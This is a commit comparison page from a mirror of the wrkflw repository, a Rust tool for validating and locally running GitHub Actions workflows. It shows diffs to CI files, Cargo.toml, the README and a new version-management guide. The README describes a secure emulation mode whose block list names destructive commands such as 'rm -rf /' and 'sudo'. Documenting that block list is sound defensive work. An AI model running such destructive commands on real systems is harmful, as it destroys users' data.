mirror of
https://github.com/bahdotsh/wrkflw.git
synced 2025-12-30 17:06:56 +01:00
Compare commits
57 Commits
bahdotsh/v
...
wrkflw-git
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
7970e6ad7d | ||
|
|
51a655f07b | ||
|
|
7ac18f3715 | ||
|
|
1f3fee7373 | ||
|
|
f49ccd70d9 | ||
|
|
5161882989 | ||
|
|
5e9658c885 | ||
|
|
aa9da33b30 | ||
|
|
dff3697052 | ||
|
|
5051f71b8b | ||
|
|
64b980d254 | ||
|
|
2d809388a2 | ||
|
|
03af6cb7c1 | ||
|
|
ae52779e11 | ||
|
|
fe7be3e1ae | ||
|
|
30f405ccb9 | ||
|
|
1d56d86ba5 | ||
|
|
f1ca411281 | ||
|
|
797e31e3d3 | ||
|
|
4e66f65de7 | ||
|
|
335886ac70 | ||
|
|
8005cbb7ee | ||
|
|
5b216f59e6 | ||
|
|
7a17d26589 | ||
|
|
6efad9ce96 | ||
|
|
064f7259d7 | ||
|
|
db1d4bcf48 | ||
|
|
250a88ba94 | ||
|
|
cd56ce8506 | ||
|
|
8fc6dcaa6c | ||
|
|
3f7bd30cca | ||
|
|
960f7486a2 | ||
|
|
cb936cd1af | ||
|
|
625b8111f1 | ||
|
|
b2b6e9e08d | ||
|
|
86660ae573 | ||
|
|
886c415fa7 | ||
|
|
460357d9fe | ||
|
|
096ccfa180 | ||
|
|
8765537cfa | ||
|
|
ac708902ef | ||
|
|
d1268d55cf | ||
|
|
a146d94c35 | ||
|
|
7636195380 | ||
|
|
98afdb3372 | ||
|
|
58de01e69f | ||
|
|
880cae3899 | ||
|
|
66e540645d | ||
|
|
79b6389f54 | ||
|
|
5d55812872 | ||
|
|
537bf2f9d1 | ||
|
|
f0b6633cb8 | ||
|
|
181b5c5463 | ||
|
|
1cc3bf98b6 | ||
|
|
af8ac002e4 | ||
|
|
50e62fbc1f | ||
|
|
30659ac5d6 |
16
.github/workflows/build.yml
vendored
16
.github/workflows/build.yml
vendored
@@ -3,7 +3,7 @@ name: Build
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches: [ main ]
|
||||
branches: [main]
|
||||
pull_request:
|
||||
|
||||
jobs:
|
||||
@@ -12,12 +12,14 @@ jobs:
|
||||
runs-on: ${{ matrix.os }}
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest]
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
include:
|
||||
- os: ubuntu-latest
|
||||
target: x86_64-unknown-linux-gnu
|
||||
- os: macos-latest
|
||||
target: x86_64-apple-darwin
|
||||
- os: windows-latest
|
||||
target: x86_64-pc-windows-msvc
|
||||
|
||||
steps:
|
||||
- name: Checkout code
|
||||
@@ -31,27 +33,27 @@ jobs:
|
||||
target: ${{ matrix.target }}
|
||||
override: true
|
||||
components: clippy, rustfmt
|
||||
|
||||
|
||||
- name: Check formatting
|
||||
uses: actions-rs/cargo@v1
|
||||
with:
|
||||
command: fmt
|
||||
args: -- --check
|
||||
|
||||
|
||||
- name: Run clippy
|
||||
uses: actions-rs/cargo@v1
|
||||
with:
|
||||
command: clippy
|
||||
args: -- -D warnings
|
||||
|
||||
|
||||
- name: Build
|
||||
uses: actions-rs/cargo@v1
|
||||
with:
|
||||
command: build
|
||||
args: --target ${{ matrix.target }}
|
||||
|
||||
|
||||
- name: Run tests
|
||||
uses: actions-rs/cargo@v1
|
||||
with:
|
||||
command: test
|
||||
args: --target ${{ matrix.target }}
|
||||
args: --target ${{ matrix.target }}
|
||||
|
||||
25
.github/workflows/release.yml
vendored
25
.github/workflows/release.yml
vendored
@@ -42,7 +42,30 @@ jobs:
|
||||
cargo install git-cliff --force
|
||||
|
||||
- name: Generate Changelog
|
||||
run: git-cliff --latest --output CHANGELOG.md
|
||||
run: |
|
||||
# Debug: Show current state
|
||||
echo "Current ref: ${{ github.ref_name }}"
|
||||
echo "Input version: ${{ github.event.inputs.version }}"
|
||||
echo "All tags:"
|
||||
git tag --sort=-version:refname | head -10
|
||||
|
||||
# Generate changelog from the current tag to the previous version tag
|
||||
CURRENT_TAG="${{ github.event.inputs.version || github.ref_name }}"
|
||||
PREVIOUS_TAG=$(git tag --sort=-version:refname | grep "^v" | head -2 | tail -1)
|
||||
|
||||
echo "Current tag: $CURRENT_TAG"
|
||||
echo "Previous tag: $PREVIOUS_TAG"
|
||||
|
||||
if [ -n "$PREVIOUS_TAG" ] && [ "$PREVIOUS_TAG" != "$CURRENT_TAG" ]; then
|
||||
echo "Generating changelog for range: $PREVIOUS_TAG..$CURRENT_TAG"
|
||||
git-cliff --tag "$CURRENT_TAG" "$PREVIOUS_TAG..$CURRENT_TAG" --output CHANGELOG.md
|
||||
else
|
||||
echo "Generating latest changelog for tag: $CURRENT_TAG"
|
||||
git-cliff --tag "$CURRENT_TAG" --latest --output CHANGELOG.md
|
||||
fi
|
||||
|
||||
echo "Generated changelog:"
|
||||
cat CHANGELOG.md
|
||||
|
||||
- name: Create Release
|
||||
id: create_release
|
||||
|
||||
1748
Cargo.lock
generated
1748
Cargo.lock
generated
File diff suppressed because it is too large
Load Diff
27
Cargo.toml
27
Cargo.toml
@@ -1,11 +1,9 @@
|
||||
[workspace]
|
||||
members = [
|
||||
"crates/*"
|
||||
]
|
||||
members = ["crates/*"]
|
||||
resolver = "2"
|
||||
|
||||
[workspace.package]
|
||||
version = "0.4.0"
|
||||
version = "0.7.3"
|
||||
edition = "2021"
|
||||
description = "A GitHub Actions workflow validator and executor"
|
||||
documentation = "https://github.com/bahdotsh/wrkflw"
|
||||
@@ -16,6 +14,22 @@ categories = ["command-line-utilities"]
|
||||
license = "MIT"
|
||||
|
||||
[workspace.dependencies]
|
||||
# Internal crate dependencies
|
||||
wrkflw-models = { path = "crates/models", version = "0.7.2" }
|
||||
wrkflw-evaluator = { path = "crates/evaluator", version = "0.7.2" }
|
||||
wrkflw-executor = { path = "crates/executor", version = "0.7.2" }
|
||||
wrkflw-github = { path = "crates/github", version = "0.7.2" }
|
||||
wrkflw-gitlab = { path = "crates/gitlab", version = "0.7.2" }
|
||||
wrkflw-logging = { path = "crates/logging", version = "0.7.2" }
|
||||
wrkflw-matrix = { path = "crates/matrix", version = "0.7.2" }
|
||||
wrkflw-parser = { path = "crates/parser", version = "0.7.2" }
|
||||
wrkflw-runtime = { path = "crates/runtime", version = "0.7.2" }
|
||||
wrkflw-secrets = { path = "crates/secrets", version = "0.7.2" }
|
||||
wrkflw-ui = { path = "crates/ui", version = "0.7.2" }
|
||||
wrkflw-utils = { path = "crates/utils", version = "0.7.2" }
|
||||
wrkflw-validators = { path = "crates/validators", version = "0.7.2" }
|
||||
|
||||
# External dependencies
|
||||
clap = { version = "4.3", features = ["derive"] }
|
||||
colored = "2.0"
|
||||
serde = { version = "1.0", features = ["derive"] }
|
||||
@@ -44,7 +58,10 @@ rayon = "1.7.0"
|
||||
num_cpus = "1.16.0"
|
||||
regex = "1.10"
|
||||
lazy_static = "1.4"
|
||||
reqwest = { version = "0.11", features = ["json"] }
|
||||
reqwest = { version = "0.11", default-features = false, features = [
|
||||
"rustls-tls",
|
||||
"json",
|
||||
] }
|
||||
libc = "0.2"
|
||||
nix = { version = "0.27.1", features = ["fs"] }
|
||||
urlencoding = "2.1.3"
|
||||
|
||||
181
README.md
181
README.md
@@ -14,22 +14,58 @@ WRKFLW is a powerful command-line tool for validating and executing GitHub Actio
|
||||
|
||||
- **TUI Interface**: A full-featured terminal user interface for managing and monitoring workflow executions
|
||||
- **Validate Workflow Files**: Check for syntax errors and common mistakes in GitHub Actions workflow files with proper exit codes for CI/CD integration
|
||||
- **Execute Workflows Locally**: Run workflows directly on your machine using Docker containers
|
||||
- **Emulation Mode**: Optional execution without Docker by emulating the container environment locally
|
||||
- **Execute Workflows Locally**: Run workflows directly on your machine using Docker or Podman containers
|
||||
- **Multiple Container Runtimes**: Support for Docker, Podman, and emulation mode for maximum flexibility
|
||||
- **Job Dependency Resolution**: Automatically determines the correct execution order based on job dependencies
|
||||
- **Docker Integration**: Execute workflow steps in isolated Docker containers with proper environment setup
|
||||
- **Container Integration**: Execute workflow steps in isolated containers with proper environment setup
|
||||
- **GitHub Context**: Provides GitHub-like environment variables and workflow commands
|
||||
- **Multiple Runtime Modes**: Choose between Docker containers or local emulation for maximum flexibility
|
||||
- **Rootless Execution**: Podman support enables running containers without root privileges
|
||||
- **Action Support**: Supports various GitHub Actions types:
|
||||
- Docker container actions
|
||||
- JavaScript actions
|
||||
- Composite actions
|
||||
- Local actions
|
||||
- **Special Action Handling**: Native handling for commonly used actions like `actions/checkout`
|
||||
- **Reusable Workflows (Caller Jobs)**: Execute jobs that call reusable workflows via `jobs.<id>.uses` (local path or `owner/repo/path@ref`)
|
||||
- **Output Capturing**: View logs, step outputs, and execution details
|
||||
- **Parallel Job Execution**: Runs independent jobs in parallel for faster workflow execution
|
||||
- **Trigger Workflows Remotely**: Manually trigger workflow runs on GitHub or GitLab
|
||||
|
||||
## Requirements
|
||||
|
||||
### Container Runtime (Optional)
|
||||
|
||||
WRKFLW supports multiple container runtimes for isolated execution:
|
||||
|
||||
- **Docker**: The default container runtime. Install from [docker.com](https://docker.com)
|
||||
- **Podman**: A rootless container runtime. Perfect for environments where Docker isn't available or permitted. Install from [podman.io](https://podman.io)
|
||||
- **Emulation**: No container runtime required. Executes commands directly on the host system
|
||||
|
||||
### Podman Support
|
||||
|
||||
Podman is particularly useful in environments where:
|
||||
- Docker installation is not permitted by your organization
|
||||
- Root privileges are not available for Docker daemon
|
||||
- You prefer rootless container execution
|
||||
- Enhanced security through daemonless architecture is desired
|
||||
|
||||
To use Podman:
|
||||
```bash
|
||||
# Install Podman (varies by OS)
|
||||
# On macOS with Homebrew:
|
||||
brew install podman
|
||||
|
||||
# On Ubuntu/Debian:
|
||||
sudo apt-get install podman
|
||||
|
||||
# Initialize Podman machine (macOS/Windows)
|
||||
podman machine init
|
||||
podman machine start
|
||||
|
||||
# Use with wrkflw
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
```
|
||||
|
||||
## Installation
|
||||
|
||||
The recommended way to install `wrkflw` is using Rust's package manager, Cargo:
|
||||
@@ -75,6 +111,12 @@ wrkflw validate path/to/workflow.yml
|
||||
# Validate workflows in a specific directory
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories (GitHub and GitLab are auto-detected)
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Force GitLab parsing for all provided paths
|
||||
wrkflw validate --gitlab .gitlab-ci.yml other.gitlab-ci.yml
|
||||
|
||||
# Validate with verbose output
|
||||
wrkflw validate --verbose path/to/workflow.yml
|
||||
|
||||
@@ -115,8 +157,11 @@ fi
|
||||
# Run a workflow with Docker (default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
# Run a workflow in emulation mode (without Docker)
|
||||
wrkflw run --emulate .github/workflows/ci.yml
|
||||
# Run a workflow with Podman instead of Docker
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
|
||||
# Run a workflow in emulation mode (without containers)
|
||||
wrkflw run --runtime emulation .github/workflows/ci.yml
|
||||
|
||||
# Run with verbose output
|
||||
wrkflw run --verbose .github/workflows/ci.yml
|
||||
@@ -137,8 +182,11 @@ wrkflw tui path/to/workflows
|
||||
# Open TUI with a specific workflow pre-selected
|
||||
wrkflw tui path/to/workflow.yml
|
||||
|
||||
# Open TUI with Podman runtime
|
||||
wrkflw tui --runtime podman
|
||||
|
||||
# Open TUI in emulation mode
|
||||
wrkflw tui --emulate
|
||||
wrkflw tui --runtime emulation
|
||||
```
|
||||
|
||||
### Triggering Workflows Remotely
|
||||
@@ -162,7 +210,7 @@ The terminal user interface provides an interactive way to manage workflows:
|
||||
- **r**: Run all selected workflows
|
||||
- **a**: Select all workflows
|
||||
- **n**: Deselect all workflows
|
||||
- **e**: Toggle between Docker and Emulation mode
|
||||
- **e**: Cycle through runtime modes (Docker → Podman → Emulation)
|
||||
- **v**: Toggle between Execution and Validation mode
|
||||
- **Esc**: Back / Exit detailed view
|
||||
- **q**: Quit application
|
||||
@@ -225,20 +273,22 @@ $ wrkflw
|
||||
# This will automatically load .github/workflows files into the TUI
|
||||
```
|
||||
|
||||
## Requirements
|
||||
## System Requirements
|
||||
|
||||
- Rust 1.67 or later
|
||||
- Docker (optional, for container-based execution)
|
||||
- When not using Docker, the emulation mode can run workflows using your local system tools
|
||||
- Container Runtime (optional, for container-based execution):
|
||||
- **Docker**: Traditional container runtime
|
||||
- **Podman**: Rootless alternative to Docker
|
||||
- **None**: Emulation mode runs workflows using local system tools
|
||||
|
||||
## How It Works
|
||||
|
||||
WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For Docker mode, it creates containers that closely match GitHub's runner environments. The workflow execution process:
|
||||
WRKFLW parses your GitHub Actions workflow files and executes each job and step in the correct order. For container modes (Docker/Podman), it creates containers that closely match GitHub's runner environments. The workflow execution process:
|
||||
|
||||
1. **Parsing**: Reads and validates the workflow YAML structure
|
||||
2. **Dependency Resolution**: Creates an execution plan based on job dependencies
|
||||
3. **Environment Setup**: Prepares GitHub-like environment variables and context
|
||||
4. **Execution**: Runs each job and step either in Docker containers or through local emulation
|
||||
4. **Execution**: Runs each job and step either in containers (Docker/Podman) or through local emulation
|
||||
5. **Monitoring**: Tracks progress and captures outputs in the TUI or command line
|
||||
|
||||
## Advanced Features
|
||||
@@ -262,7 +312,7 @@ WRKFLW supports composite actions, which are actions made up of multiple steps.
|
||||
|
||||
### Container Cleanup
|
||||
|
||||
WRKFLW automatically cleans up any Docker containers created during workflow execution, even if the process is interrupted with Ctrl+C.
|
||||
WRKFLW automatically cleans up any containers created during workflow execution (Docker/Podman), even if the process is interrupted with Ctrl+C.
|
||||
|
||||
For debugging failed workflows, you can preserve containers that fail by using the `--preserve-containers-on-failure` flag:
|
||||
|
||||
@@ -277,10 +327,46 @@ wrkflw tui --preserve-containers-on-failure
|
||||
When a container fails with this flag enabled, WRKFLW will:
|
||||
- Keep the failed container running instead of removing it
|
||||
- Log the container ID and provide inspection instructions
|
||||
- Show a message like: `Preserving container abc123 for debugging (exit code: 1). Use 'docker exec -it abc123 bash' to inspect.`
|
||||
- Show a message like: `Preserving container abc123 for debugging (exit code: 1). Use 'docker exec -it abc123 bash' to inspect.` (Docker)
|
||||
- Or: `Preserving container abc123 for debugging (exit code: 1). Use 'podman exec -it abc123 bash' to inspect.` (Podman)
|
||||
|
||||
This allows you to inspect the exact state of the container when the failure occurred, examine files, check environment variables, and debug issues more effectively.
|
||||
|
||||
### Podman-Specific Features
|
||||
|
||||
When using Podman as the container runtime, you get additional benefits:
|
||||
|
||||
**Rootless Operation:**
|
||||
```bash
|
||||
# Run workflows without root privileges
|
||||
wrkflw run --runtime podman .github/workflows/ci.yml
|
||||
```
|
||||
|
||||
**Enhanced Security:**
|
||||
- Daemonless architecture reduces attack surface
|
||||
- User namespaces provide additional isolation
|
||||
- No privileged daemon required
|
||||
|
||||
**Container Inspection:**
|
||||
```bash
|
||||
# List preserved containers
|
||||
podman ps -a --filter "name=wrkflw-"
|
||||
|
||||
# Inspect a preserved container's filesystem (without executing)
|
||||
podman mount <container-id>
|
||||
|
||||
# Or run a new container with the same volumes
|
||||
podman run --rm -it --volumes-from <failed-container> ubuntu:20.04 bash
|
||||
|
||||
# Clean up all wrkflw containers
|
||||
podman ps -a --filter "name=wrkflw-" --format "{{.Names}}" | xargs podman rm -f
|
||||
```
|
||||
|
||||
**Compatibility:**
|
||||
- Drop-in replacement for Docker workflows
|
||||
- Same CLI options and behavior
|
||||
- Identical container execution environment
|
||||
|
||||
## Limitations
|
||||
|
||||
### Supported Features
|
||||
@@ -288,11 +374,12 @@ This allows you to inspect the exact state of the container when the failure occ
|
||||
- ✅ Job dependency resolution and parallel execution (all jobs with correct 'needs' relationships are executed in the right order, and independent jobs run in parallel)
|
||||
- ✅ Matrix builds (supported for reasonable matrix sizes; very large matrices may be slow or resource-intensive)
|
||||
- ✅ Environment variables and GitHub context (all standard GitHub Actions environment variables and context objects are emulated)
|
||||
- ✅ Docker container actions (all actions that use Docker containers are supported in Docker mode)
|
||||
- ✅ Container actions (all actions that use containers are supported in Docker and Podman modes)
|
||||
- ✅ JavaScript actions (all actions that use JavaScript are supported)
|
||||
- ✅ Composite actions (all composite actions, including nested and local composite actions, are supported)
|
||||
- ✅ Local actions (actions referenced with local paths are supported)
|
||||
- ✅ Special handling for common actions (e.g., `actions/checkout` is natively supported)
|
||||
- ✅ Reusable workflows (caller): Jobs that use `jobs.<id>.uses` to call local or remote workflows are executed; inputs and secrets are propagated to the called workflow
|
||||
- ✅ Workflow triggering via `workflow_dispatch` (manual triggering of workflows is supported)
|
||||
- ✅ GitLab pipeline triggering (manual triggering of GitLab pipelines is supported)
|
||||
- ✅ Environment files (`GITHUB_OUTPUT`, `GITHUB_ENV`, `GITHUB_PATH`, `GITHUB_STEP_SUMMARY` are fully supported)
|
||||
@@ -303,35 +390,81 @@ This allows you to inspect the exact state of the container when the failure occ
|
||||
|
||||
### Limited or Unsupported Features (Explicit List)
|
||||
- ❌ GitHub secrets and permissions: Only basic environment variables are supported. GitHub's encrypted secrets and fine-grained permissions are NOT available.
|
||||
- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker mode (no persistent cache between runs).
|
||||
- ❌ GitHub Actions cache: Caching functionality (e.g., `actions/cache`) is NOT supported in emulation mode and only partially supported in Docker and Podman modes (no persistent cache between runs).
|
||||
- ❌ GitHub API integrations: Only basic workflow triggering is supported. Features like workflow status reporting, artifact upload/download, and API-based job control are NOT available.
|
||||
- ❌ GitHub-specific environment variables: Some advanced or dynamic environment variables (e.g., those set by GitHub runners or by the GitHub API) are emulated with static or best-effort values, but not all are fully functional.
|
||||
- ❌ Large/complex matrix builds: Very large matrices (hundreds or thousands of job combinations) may not be practical due to performance and resource limits.
|
||||
- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual Docker configuration.
|
||||
- ❌ Network-isolated actions: Actions that require strict network isolation or custom network configuration may not work out-of-the-box and may require manual container runtime configuration.
|
||||
- ❌ Some event triggers: Only `workflow_dispatch` (manual trigger) is fully supported. Other triggers (e.g., `push`, `pull_request`, `schedule`, `release`, etc.) are NOT supported.
|
||||
- ❌ GitHub runner-specific features: Features that depend on the exact GitHub-hosted runner environment (e.g., pre-installed tools, runner labels, or hardware) are NOT guaranteed to match. Only a best-effort emulation is provided.
|
||||
- ❌ Windows and macOS runners: Only Linux-based runners are fully supported. Windows and macOS jobs are NOT supported.
|
||||
- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker mode. In emulation mode, they are NOT supported.
|
||||
- ❌ Service containers: Service containers (e.g., databases defined in `services:`) are only supported in Docker and Podman modes. In emulation mode, they are NOT supported.
|
||||
- ❌ Artifacts: Uploading and downloading artifacts between jobs/steps is NOT supported.
|
||||
- ❌ Job/step timeouts: Custom timeouts for jobs and steps are NOT enforced.
|
||||
- ❌ Job/step concurrency and cancellation: Features like `concurrency` and job cancellation are NOT supported.
|
||||
- ❌ Expressions and advanced YAML features: Most common expressions are supported, but some advanced or edge-case expressions may not be fully implemented.
|
||||
- ⚠️ Reusable workflows (limits):
|
||||
- Outputs from called workflows are not propagated back to the caller (`needs.<id>.outputs.*` not supported)
|
||||
- `secrets: inherit` is not special-cased; provide a mapping to pass secrets
|
||||
- Remote calls clone public repos via HTTPS; private repos require preconfigured access (not yet implemented)
|
||||
- Deeply nested reusable calls work but lack cycle detection beyond regular job dependency checks
|
||||
|
||||
## Reusable Workflows
|
||||
|
||||
WRKFLW supports executing reusable workflow caller jobs.
|
||||
|
||||
### Syntax
|
||||
|
||||
```yaml
|
||||
jobs:
|
||||
call-local:
|
||||
uses: ./.github/workflows/shared.yml
|
||||
|
||||
call-remote:
|
||||
uses: my-org/my-repo/.github/workflows/shared.yml@v1
|
||||
with:
|
||||
foo: bar
|
||||
secrets:
|
||||
token: ${{ secrets.MY_TOKEN }}
|
||||
```
|
||||
|
||||
### Behavior
|
||||
- Local references are resolved relative to the current working directory.
|
||||
- Remote references are shallow-cloned at the specified `@ref` into a temporary directory.
|
||||
- `with:` entries are exposed to the called workflow as environment variables `INPUT_<KEY>`.
|
||||
- `secrets:` mapping entries are exposed as environment variables `SECRET_<KEY>`.
|
||||
- The called workflow executes according to its own `jobs`/`needs`; a summary of its job results is reported as a single result for the caller job.
|
||||
|
||||
### Current limitations
|
||||
- Outputs from called workflows are not surfaced back to the caller.
|
||||
- `secrets: inherit` is not supported; specify an explicit mapping.
|
||||
- Private repositories for remote `uses:` are not yet supported.
|
||||
|
||||
### Runtime Mode Differences
|
||||
- **Docker Mode**: Provides the closest match to GitHub's environment, including support for Docker container actions, service containers, and Linux-based jobs. Some advanced container configurations may still require manual setup.
|
||||
- **Emulation Mode**: Runs workflows using the local system tools. Limitations:
|
||||
- **Podman Mode**: Similar to Docker mode but uses Podman for container execution. Offers rootless container support and enhanced security. Fully compatible with Docker-based workflows.
|
||||
- **🔒 Secure Emulation Mode**: Runs workflows on the local system with comprehensive sandboxing for security. **Recommended for local development**:
|
||||
- Command validation and filtering (blocks dangerous commands like `rm -rf /`, `sudo`, etc.)
|
||||
- Resource limits (CPU, memory, execution time)
|
||||
- Filesystem access controls
|
||||
- Process monitoring and limits
|
||||
- Safe for running untrusted workflows locally
|
||||
- **⚠️ Emulation Mode (Legacy)**: Runs workflows using local system tools without sandboxing. **Not recommended - use Secure Emulation instead**:
|
||||
- Only supports local and JavaScript actions (no Docker container actions)
|
||||
- No support for service containers
|
||||
- No caching support
|
||||
- **No security protections - can execute harmful commands**
|
||||
- Some actions may require adaptation to work locally
|
||||
- Special action handling is more limited
|
||||
|
||||
### Best Practices
|
||||
- Test workflows in both Docker and emulation modes to ensure compatibility
|
||||
- **Use Secure Emulation mode for local development** - provides safety without container overhead
|
||||
- Test workflows in multiple runtime modes to ensure compatibility
|
||||
- **Use Docker/Podman mode for production** - provides maximum isolation and reproducibility
|
||||
- Keep matrix builds reasonably sized for better performance
|
||||
- Use environment variables instead of GitHub secrets when possible
|
||||
- Consider using local actions for complex custom functionality
|
||||
- Test network-dependent actions carefully in both modes
|
||||
- **Review security warnings** - pay attention to blocked commands in secure emulation mode
|
||||
- **Start with secure mode** - only fall back to legacy emulation if necessary
|
||||
|
||||
## Roadmap
|
||||
|
||||
@@ -373,7 +506,7 @@ The following roadmap outlines our planned approach to implementing currently un
|
||||
### 6. Network-Isolated Actions
|
||||
- **Goal:** Support custom network configurations and strict isolation for actions.
|
||||
- **Plan:**
|
||||
- Add advanced Docker network configuration options.
|
||||
- Add advanced container network configuration options for Docker and Podman.
|
||||
- Document best practices for network isolation.
|
||||
|
||||
### 7. Event Triggers
|
||||
|
||||
279
VERSION_MANAGEMENT.md
Normal file
279
VERSION_MANAGEMENT.md
Normal file
@@ -0,0 +1,279 @@
|
||||
# Version Management Guide
|
||||
|
||||
This guide explains how to manage versions in the wrkflw workspace, both for the entire workspace and for individual crates.
|
||||
|
||||
## Overview
|
||||
|
||||
The wrkflw project uses a Cargo workspace with flexible version management that supports:
|
||||
- **Workspace-wide versioning**: All crates share the same version
|
||||
- **Individual crate versioning**: Specific crates can have their own versions
|
||||
- **Automatic dependency management**: Internal dependencies are managed through workspace inheritance
|
||||
|
||||
## Current Setup
|
||||
|
||||
### Workspace Dependencies
|
||||
All internal crate dependencies are defined in the root `Cargo.toml` under `[workspace.dependencies]`:
|
||||
|
||||
```toml
|
||||
[workspace.dependencies]
|
||||
# Internal crate dependencies
|
||||
wrkflw-models = { path = "crates/models", version = "0.7.2" }
|
||||
wrkflw-evaluator = { path = "crates/evaluator", version = "0.7.2" }
|
||||
# ... other crates
|
||||
```
|
||||
|
||||
### Crate Dependencies
|
||||
Individual crates reference internal dependencies using workspace inheritance:
|
||||
|
||||
```toml
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models.workspace = true
|
||||
wrkflw-validators.workspace = true
|
||||
```
|
||||
|
||||
This approach means:
|
||||
- ✅ No hard-coded versions in individual crates
|
||||
- ✅ Single source of truth for internal crate versions
|
||||
- ✅ Easy individual crate versioning without manual updates everywhere
|
||||
|
||||
## Version Management Strategies
|
||||
|
||||
### Strategy 1: Workspace-Wide Versioning (Recommended for most cases)
|
||||
|
||||
Use this when changes affect multiple crates or for major releases.
|
||||
|
||||
```bash
|
||||
# Bump all crates to the same version
|
||||
cargo ws version patch # 0.7.2 → 0.7.3
|
||||
cargo ws version minor # 0.7.2 → 0.8.0
|
||||
cargo ws version major # 0.7.2 → 1.0.0
|
||||
|
||||
# Or specify exact version
|
||||
cargo ws version 1.0.0
|
||||
|
||||
# Commit and tag
|
||||
git add .
|
||||
git commit -m "chore: bump workspace version to $(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')"
|
||||
git tag v$(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')
|
||||
git push origin main --tags
|
||||
```
|
||||
|
||||
### Strategy 2: Individual Crate Versioning
|
||||
|
||||
Use this when changes are isolated to specific crates.
|
||||
|
||||
#### Using the Helper Script
|
||||
|
||||
```bash
|
||||
# Bump a specific crate
|
||||
./scripts/bump-crate.sh wrkflw-models patch # 0.7.2 → 0.7.3
|
||||
./scripts/bump-crate.sh wrkflw-models minor # 0.7.2 → 0.8.0
|
||||
./scripts/bump-crate.sh wrkflw-models 0.8.5 # Specific version
|
||||
|
||||
# The script will:
|
||||
# 1. Update the crate's Cargo.toml to use explicit version
|
||||
# 2. Update workspace dependencies
|
||||
# 3. Show you next steps
|
||||
```
|
||||
|
||||
#### Manual Individual Versioning
|
||||
|
||||
If you prefer manual control:
|
||||
|
||||
1. **Update the crate's Cargo.toml**:
|
||||
```toml
|
||||
# Change from:
|
||||
version.workspace = true
|
||||
# To:
|
||||
version = "0.7.3"
|
||||
```
|
||||
|
||||
2. **Update workspace dependencies**:
|
||||
```toml
|
||||
[workspace.dependencies]
|
||||
wrkflw-models = { path = "crates/models", version = "0.7.3" }
|
||||
```
|
||||
|
||||
3. **Test and commit**:
|
||||
```bash
|
||||
cargo check
|
||||
git add .
|
||||
git commit -m "bump: wrkflw-models to 0.7.3"
|
||||
git tag v0.7.3-wrkflw-models
|
||||
git push origin main --tags
|
||||
```
|
||||
|
||||
## Release Workflows
|
||||
|
||||
### Full Workspace Release
|
||||
|
||||
```bash
|
||||
# 1. Make your changes
|
||||
# 2. Bump version
|
||||
cargo ws version patch --no-git-commit
|
||||
|
||||
# 3. Commit and tag
|
||||
git add .
|
||||
git commit -m "chore: release version $(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')"
|
||||
git tag v$(grep '^version' Cargo.toml | head -1 | sed 's/.*= *"\([^"]*\)".*/\1/')
|
||||
|
||||
# 4. Push (this triggers GitHub Actions)
|
||||
git push origin main --tags
|
||||
```
|
||||
|
||||
### Individual Crate Release
|
||||
|
||||
```bash
|
||||
# 1. Use helper script or manual method above
|
||||
./scripts/bump-crate.sh wrkflw-models patch
|
||||
|
||||
# 2. Follow the script's suggestions
|
||||
git add .
|
||||
git commit -m "bump: wrkflw-models to X.Y.Z"
|
||||
git tag vX.Y.Z-wrkflw-models
|
||||
git push origin main --tags
|
||||
|
||||
# 3. Optionally publish to crates.io
|
||||
cd crates/models
|
||||
cargo publish
|
||||
```
|
||||
|
||||
## Publishing to crates.io
|
||||
|
||||
### Publishing Individual Crates
|
||||
|
||||
```bash
|
||||
# Navigate to the crate
|
||||
cd crates/models
|
||||
|
||||
# Ensure all dependencies are published first
|
||||
# (or available on crates.io)
|
||||
cargo publish --dry-run
|
||||
|
||||
# Publish
|
||||
cargo publish
|
||||
```
|
||||
|
||||
### Publishing All Crates
|
||||
|
||||
```bash
|
||||
# Use cargo-workspaces
|
||||
cargo ws publish --from-git
|
||||
```
|
||||
|
||||
## Integration with GitHub Actions
|
||||
|
||||
The existing `.github/workflows/release.yml` works with both strategies:
|
||||
|
||||
- **Tag format `v1.2.3`**: Triggers full workspace release
|
||||
- **Tag format `v1.2.3-crate-name`**: Could be used for individual crate releases (needs workflow modification)
|
||||
|
||||
### Modifying for Individual Crate Releases
|
||||
|
||||
To support individual crate releases, you could modify the workflow to:
|
||||
|
||||
```yaml
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- 'v*' # Full releases: v1.2.3
|
||||
- 'v*-wrkflw-*' # Individual releases: v1.2.3-wrkflw-models
|
||||
```
|
||||
|
||||
## Best Practices
|
||||
|
||||
### When to Use Each Strategy
|
||||
|
||||
**Use Workspace-Wide Versioning when:**
|
||||
- Making breaking changes across multiple crates
|
||||
- Major feature releases
|
||||
- Initial development phases
|
||||
- Simpler release management is preferred
|
||||
|
||||
**Use Individual Crate Versioning when:**
|
||||
- Changes are isolated to specific functionality
|
||||
- Different crates have different stability levels
|
||||
- You want to minimize dependency updates for users
|
||||
- Publishing to crates.io with different release cadences
|
||||
|
||||
### Version Numbering
|
||||
|
||||
Follow [Semantic Versioning](https://semver.org/):
|
||||
|
||||
- **Patch (0.7.2 → 0.7.3)**: Bug fixes, internal improvements
|
||||
- **Minor (0.7.2 → 0.8.0)**: New features, backward compatible
|
||||
- **Major (0.7.2 → 1.0.0)**: Breaking changes
|
||||
|
||||
### Dependency Management
|
||||
|
||||
- Keep internal dependencies using workspace inheritance
|
||||
- Only specify explicit versions when a crate diverges from workspace version
|
||||
- Always test with `cargo check` and `cargo test` before releasing
|
||||
